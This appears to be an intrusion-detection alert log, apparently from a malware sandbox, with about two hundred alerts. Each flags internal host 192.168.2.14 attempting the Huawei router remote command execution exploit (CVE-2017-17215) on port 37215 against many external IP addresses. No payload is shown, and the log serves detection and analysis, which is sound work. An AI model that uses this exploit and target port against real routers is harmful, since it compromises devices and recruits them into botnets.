                                                        06/13/24-21:32:13.545435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4101237215192.168.2.14156.137.131.155
                                                        06/13/24-21:32:09.438194TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5862237215192.168.2.1441.183.249.21
                                                        06/13/24-21:32:52.680652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4139437215192.168.2.14197.105.81.120
                                                        06/13/24-21:32:56.756839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5994437215192.168.2.1441.194.143.73
                                                        06/13/24-21:32:25.973515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4808637215192.168.2.1441.152.253.0
                                                        06/13/24-21:32:58.841735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5116237215192.168.2.14197.45.14.130
                                                        06/13/24-21:32:11.487444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4981237215192.168.2.14197.111.168.142
                                                        06/13/24-21:32:30.127760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5172237215192.168.2.1441.91.105.26
                                                        06/13/24-21:32:46.526167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5958037215192.168.2.1441.220.168.239
                                                        06/13/24-21:32:48.573154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4299837215192.168.2.1441.228.20.243
                                                        06/13/24-21:32:56.756056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3805437215192.168.2.14156.20.152.93
                                                        06/13/24-21:32:05.343586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3632837215192.168.2.14197.127.21.54
                                                        06/13/24-21:32:56.757537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4446437215192.168.2.1441.130.6.96
                                                        06/13/24-21:32:03.295057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5412437215192.168.2.1441.19.210.36
                                                        06/13/24-21:32:36.248723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4266237215192.168.2.14156.86.87.178
                                                        06/13/24-21:32:36.263292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4149437215192.168.2.14156.227.189.206
                                                        06/13/24-21:32:13.544465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3324237215192.168.2.14197.188.150.120
                                                        06/13/24-21:32:23.833602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4791237215192.168.2.14156.78.65.94
                                                        06/13/24-21:33:07.042919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3517237215192.168.2.1441.22.102.155
                                                        06/13/24-21:32:40.356354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4503837215192.168.2.14156.122.141.139
                                                        06/13/24-21:32:30.124038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4659837215192.168.2.1441.163.123.0
                                                        06/13/24-21:32:30.096958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5001037215192.168.2.14197.125.194.186
                                                        06/13/24-21:32:38.302253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941037215192.168.2.1441.64.39.192
                                                        06/13/24-21:32:30.077695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3811037215192.168.2.14156.83.76.165
                                                        06/13/24-21:32:05.347080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4146437215192.168.2.1441.241.2.141
                                                        06/13/24-21:32:25.972521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3464837215192.168.2.1441.26.207.136
                                                        06/13/24-21:32:19.729470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3865437215192.168.2.1441.69.69.47
                                                        06/13/24-21:32:25.991541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3772837215192.168.2.14197.187.184.119
                                                        06/13/24-21:33:05.016997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5626237215192.168.2.14156.166.144.206
                                                        06/13/24-21:33:09.129013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5212637215192.168.2.1441.15.161.235
                                                        06/13/24-21:32:30.077597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4055637215192.168.2.14156.213.92.105
                                                        06/13/24-21:32:25.978438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4866637215192.168.2.14197.88.140.7
                                                        06/13/24-21:32:23.942733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4153837215192.168.2.14197.142.13.158
                                                        06/13/24-21:31:57.091961TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4052837215192.168.2.14197.222.221.189
                                                        06/13/24-21:32:28.043211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4931837215192.168.2.14197.147.202.156
                                                        06/13/24-21:32:46.508180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4092637215192.168.2.14197.115.220.205
                                                        06/13/24-21:31:59.174951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5887437215192.168.2.14197.82.79.222
                                                        06/13/24-21:32:30.128755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3858637215192.168.2.1441.180.170.71
                                                        06/13/24-21:33:07.040220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5800637215192.168.2.14197.154.212.68
                                                        06/13/24-21:33:13.211275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5678837215192.168.2.14197.115.40.169
                                                        06/13/24-21:32:44.476922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4878237215192.168.2.14156.49.185.120
                                                        06/13/24-21:32:42.405803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5309237215192.168.2.1441.150.152.120
                                                        06/13/24-21:32:13.546832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3735037215192.168.2.14197.33.133.247
                                                        06/13/24-21:32:58.823944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197237215192.168.2.1441.155.230.69
                                                        06/13/24-21:32:03.300332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4914837215192.168.2.1441.31.34.212
                                                        06/13/24-21:32:38.304429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5618437215192.168.2.14197.30.22.125
                                                        06/13/24-21:32:58.824945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4156037215192.168.2.14197.234.2.128
                                                        06/13/24-21:32:25.990431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4285637215192.168.2.14156.189.50.98
                                                        06/13/24-21:32:50.632638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5920037215192.168.2.14197.80.145.171
                                                        06/13/24-21:33:13.229929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5153437215192.168.2.14197.197.5.249
                                                        06/13/24-21:33:09.130319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5258637215192.168.2.14197.105.170.32
                                                        06/13/24-21:32:17.671092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4505837215192.168.2.14156.39.121.15
                                                        06/13/24-21:32:25.990212TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4506437215192.168.2.14156.115.34.251
                                                        06/13/24-21:33:09.089937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4993037215192.168.2.14156.246.180.49
                                                        06/13/24-21:33:09.127573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4665437215192.168.2.1441.102.196.129
                                                        06/13/24-21:31:59.177495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4952837215192.168.2.14156.144.57.76
                                                        06/13/24-21:32:17.695723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3995437215192.168.2.14156.137.160.129
                                                        06/13/24-21:33:15.272579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5619837215192.168.2.14156.113.68.169
                                                        06/13/24-21:32:19.730698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4571637215192.168.2.14197.18.247.148
                                                        06/13/24-21:32:46.508130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3525237215192.168.2.1441.214.171.2
                                                        06/13/24-21:33:09.129889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5409037215192.168.2.14197.38.11.15
                                                        06/13/24-21:32:52.654679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5321837215192.168.2.14156.198.140.6
                                                        06/13/24-21:33:09.090158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3829037215192.168.2.14197.143.102.229
                                                        06/13/24-21:32:19.750702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4343037215192.168.2.14197.63.52.30
                                                        06/13/24-21:32:40.356871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4896037215192.168.2.14197.87.0.194
                                                        06/13/24-21:32:21.781194TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5034237215192.168.2.14197.125.216.42
                                                        06/13/24-21:32:30.074782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3679637215192.168.2.14156.226.22.150
                                                        06/13/24-21:32:42.424627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3704237215192.168.2.1441.107.157.240
                                                        06/13/24-21:31:57.132036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4936637215192.168.2.14197.31.78.122
                                                        06/13/24-21:32:23.943211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4078637215192.168.2.14197.212.204.133
                                                        06/13/24-21:32:52.677265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5481437215192.168.2.14156.243.253.12
                                                        06/13/24-21:32:11.486925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3560237215192.168.2.14156.29.117.65
                                                        06/13/24-21:32:36.241661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3785037215192.168.2.1441.202.78.191
                                                        06/13/24-21:32:58.842709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3673637215192.168.2.14197.152.3.159
                                                        06/13/24-21:31:57.137179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4677637215192.168.2.14197.154.74.163
                                                        06/13/24-21:32:30.095429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4499837215192.168.2.14197.101.255.135
                                                        06/13/24-21:33:17.306960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5209637215192.168.2.1441.199.244.100
                                                        06/13/24-21:32:11.486244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3671637215192.168.2.14156.202.31.251
                                                        06/13/24-21:32:50.613850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4372637215192.168.2.14197.235.14.170
                                                        06/13/24-21:33:15.256131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3718837215192.168.2.14156.98.71.206
                                                        06/13/24-21:32:01.240460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4660037215192.168.2.14197.250.137.31
                                                        06/13/24-21:33:13.231862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5523637215192.168.2.14197.211.55.81
                                                        06/13/24-21:32:03.309899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3616637215192.168.2.14197.119.202.20
                                                        06/13/24-21:32:05.376980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5497637215192.168.2.1441.251.22.197
                                                        06/13/24-21:32:34.191476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3293837215192.168.2.1441.104.176.188
                                                        06/13/24-21:32:23.836763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3940437215192.168.2.14156.109.89.163
                                                        06/13/24-21:32:56.756744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4965637215192.168.2.14197.24.255.197
                                                        06/13/24-21:32:42.419327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6065837215192.168.2.14156.99.194.164
                                                        06/13/24-21:33:15.254497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5168237215192.168.2.1441.65.122.213
                                                        06/13/24-21:31:59.200030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4830237215192.168.2.1441.11.160.248
                                                        06/13/24-21:32:30.098425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4204837215192.168.2.1441.86.225.249
                                                        06/13/24-21:33:13.229883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5412437215192.168.2.14197.226.225.224
                                                        06/13/24-21:32:01.222017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5328237215192.168.2.14156.209.151.245
                                                        06/13/24-21:32:40.359790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4057837215192.168.2.1441.44.71.135
                                                        06/13/24-21:33:07.060846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5177437215192.168.2.14197.166.37.9
                                                        06/13/24-21:32:36.247603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4194837215192.168.2.14156.162.79.31
                                                        06/13/24-21:32:52.654484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5019437215192.168.2.1441.204.102.126
                                                        06/13/24-21:32:56.754229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5769437215192.168.2.1441.110.82.50
                                                        06/13/24-21:32:23.943579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4322237215192.168.2.14156.250.43.35
                                                        06/13/24-21:31:59.176266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4430037215192.168.2.1441.148.5.11
                                                        06/13/24-21:32:40.358306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3388637215192.168.2.1441.98.82.146
                                                        06/13/24-21:32:42.420708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3489437215192.168.2.14156.54.97.129
                                                        06/13/24-21:33:00.869904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3562237215192.168.2.14197.25.66.44
                                                        06/13/24-21:32:32.169110TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3573637215192.168.2.14156.205.135.220
                                                        06/13/24-21:32:42.422110TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4023637215192.168.2.14156.18.185.110
                                                        06/13/24-21:32:19.751998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717837215192.168.2.1441.60.243.144
                                                        06/13/24-21:32:36.266521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3873437215192.168.2.14156.94.58.57
                                                        06/13/24-21:32:03.277976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4215637215192.168.2.14156.107.211.96
                                                        06/13/24-21:33:00.870030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4131037215192.168.2.14197.124.76.104
                                                        06/13/24-21:33:05.011500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3969437215192.168.2.14156.233.113.160
                                                        06/13/24-21:32:11.506616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3650037215192.168.2.14197.202.193.236
                                                        06/13/24-21:32:28.043325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4373637215192.168.2.1441.132.24.2
                                                        06/13/24-21:32:52.678281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4016637215192.168.2.14156.46.182.6
                                                        06/13/24-21:33:11.172990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3949637215192.168.2.14156.212.133.198
                                                        06/13/24-21:32:15.633263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4917437215192.168.2.14156.204.186.206
                                                        06/13/24-21:32:09.439908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4357637215192.168.2.14156.250.150.3
                                                        06/13/24-21:32:52.660251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5382637215192.168.2.1441.175.43.47
                                                        06/13/24-21:32:28.028153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3603237215192.168.2.14197.110.122.36
                                                        06/13/24-21:32:15.638689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3515237215192.168.2.14156.229.149.91
                                                        06/13/24-21:32:40.354598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3783837215192.168.2.14197.91.234.161
                                                        06/13/24-21:32:52.677087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5629037215192.168.2.14197.102.72.201
                                                        06/13/24-21:32:34.215676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5618637215192.168.2.14197.90.195.78
                                                        06/13/24-21:31:59.198164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5324837215192.168.2.14197.195.180.119
                                                        06/13/24-21:32:07.402375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5406637215192.168.2.14197.227.87.157
                                                        06/13/24-21:33:15.259115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5289237215192.168.2.14197.59.12.120
                                                        06/13/24-21:32:07.404622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3432437215192.168.2.14197.254.172.38
                                                        06/13/24-21:33:00.872529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4790237215192.168.2.14197.81.63.78
                                                        06/13/24-21:32:19.729537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5632837215192.168.2.1441.75.29.253
                                                        06/13/24-21:32:21.782702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5188637215192.168.2.14156.68.200.155
                                                        06/13/24-21:33:17.309969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4685837215192.168.2.14197.24.177.166
                                                        06/13/24-21:32:54.725067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3706837215192.168.2.14156.82.121.102
                                                        06/13/24-21:32:56.785659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4407437215192.168.2.1441.209.143.246
                                                        06/13/24-21:32:58.824984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5224237215192.168.2.14197.57.12.52
                                                        06/13/24-21:32:25.971846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5983837215192.168.2.14197.46.86.164
                                                        06/13/24-21:33:07.057433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3937637215192.168.2.14197.91.63.144
                                                        06/13/24-21:32:13.567790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3356837215192.168.2.14197.207.202.230
                                                        06/13/24-21:32:34.214950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3817037215192.168.2.14156.170.138.181
                                                        06/13/24-21:33:11.155239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5993237215192.168.2.1441.232.149.18
                                                        06/13/24-21:32:46.502854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5126237215192.168.2.1441.97.22.143
                                                        06/13/24-21:32:15.631109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4491437215192.168.2.14156.73.250.206
                                                        06/13/24-21:33:00.870073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3319237215192.168.2.14197.202.68.167
                                                        06/13/24-21:32:52.657453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5454237215192.168.2.14197.117.10.136
                                                        06/13/24-21:32:25.992741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4820037215192.168.2.14197.99.50.34
                                                        06/13/24-21:32:36.269479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5584837215192.168.2.14156.205.159.0
                                                        06/13/24-21:32:23.942351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4442837215192.168.2.1441.9.1.77
                                                        06/13/24-21:32:52.660324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3589837215192.168.2.1441.179.7.243
                                                        06/13/24-21:32:34.214348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4624837215192.168.2.14156.183.54.92
                                                        06/13/24-21:32:23.834540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4132437215192.168.2.14156.242.160.233
                                                        06/13/24-21:32:25.977022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5407637215192.168.2.1441.70.17.81
                                                        06/13/24-21:32:30.074239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4176237215192.168.2.14156.83.251.92
                                                        06/13/24-21:32:13.546795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5138437215192.168.2.14156.166.77.195
                                                        06/13/24-21:31:57.133278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4291837215192.168.2.1441.162.16.194
                                                        06/13/24-21:33:00.885686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5595437215192.168.2.14156.194.131.166
                                                        06/13/24-21:32:09.438859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5204437215192.168.2.14197.221.98.194
                                                        06/13/24-21:33:17.305418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5912237215192.168.2.14197.182.47.190
                                                        06/13/24-21:32:58.838949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5916437215192.168.2.1441.149.64.22
                                                        06/13/24-21:33:00.886210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3983637215192.168.2.14156.52.221.13
                                                        06/13/24-21:32:46.524341TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4837237215192.168.2.1441.86.2.91
                                                        06/13/24-21:32:48.554620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6025837215192.168.2.14156.158.38.127
                                                        06/13/24-21:32:13.547389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3506237215192.168.2.1441.182.58.102
                                                        06/13/24-21:32:44.455167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4142237215192.168.2.14156.139.161.16
                                                        06/13/24-21:32:42.417880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3951837215192.168.2.1441.98.198.237
                                                        06/13/24-21:32:25.996608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197637215192.168.2.14156.97.18.226
                                                        06/13/24-21:32:32.170411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4619037215192.168.2.14156.75.3.179
                                                        06/13/24-21:32:32.171375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5069437215192.168.2.14156.130.17.167
                                                        06/13/24-21:32:05.349980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3621637215192.168.2.14156.135.77.146
                                                        06/13/24-21:32:42.421051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4401037215192.168.2.1441.165.23.199
                                                        06/13/24-21:33:04.994019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4428237215192.168.2.1441.53.164.185
                                                        06/13/24-21:32:11.488995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3443837215192.168.2.1441.100.89.57
                                                        06/13/24-21:32:52.655582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3900037215192.168.2.14197.122.19.12
                                                        06/13/24-21:33:05.011634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3663837215192.168.2.1441.170.72.188
                                                        06/13/24-21:31:59.196832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5679837215192.168.2.14156.192.228.40
                                                        06/13/24-21:33:00.867313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3596237215192.168.2.14197.96.153.204
                                                        06/13/24-21:32:15.638155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6008237215192.168.2.14156.243.231.198
                                                        06/13/24-21:33:15.277257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5077437215192.168.2.1441.27.226.119
                                                        06/13/24-21:33:07.040291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4140237215192.168.2.14156.159.212.194
                                                        06/13/24-21:32:30.076183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3890237215192.168.2.14197.73.0.4
                                                        06/13/24-21:32:46.504073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3664037215192.168.2.14156.92.85.78
                                                        06/13/24-21:33:00.887955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3374437215192.168.2.14197.14.106.82
                                                        06/13/24-21:33:15.273439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5335837215192.168.2.14197.209.191.175
                                                        06/13/24-21:32:54.726602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5156837215192.168.2.14156.86.121.199
                                                        06/13/24-21:33:17.306007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4194237215192.168.2.14197.99.51.83
                                                        06/13/24-21:32:03.278492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3843237215192.168.2.14197.35.140.134
                                                        06/13/24-21:33:05.012842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4886637215192.168.2.1441.227.222.95
                                                        06/13/24-21:32:42.419873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5641237215192.168.2.1441.22.5.39
                                                        06/13/24-21:32:54.711718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4839637215192.168.2.1441.72.82.215
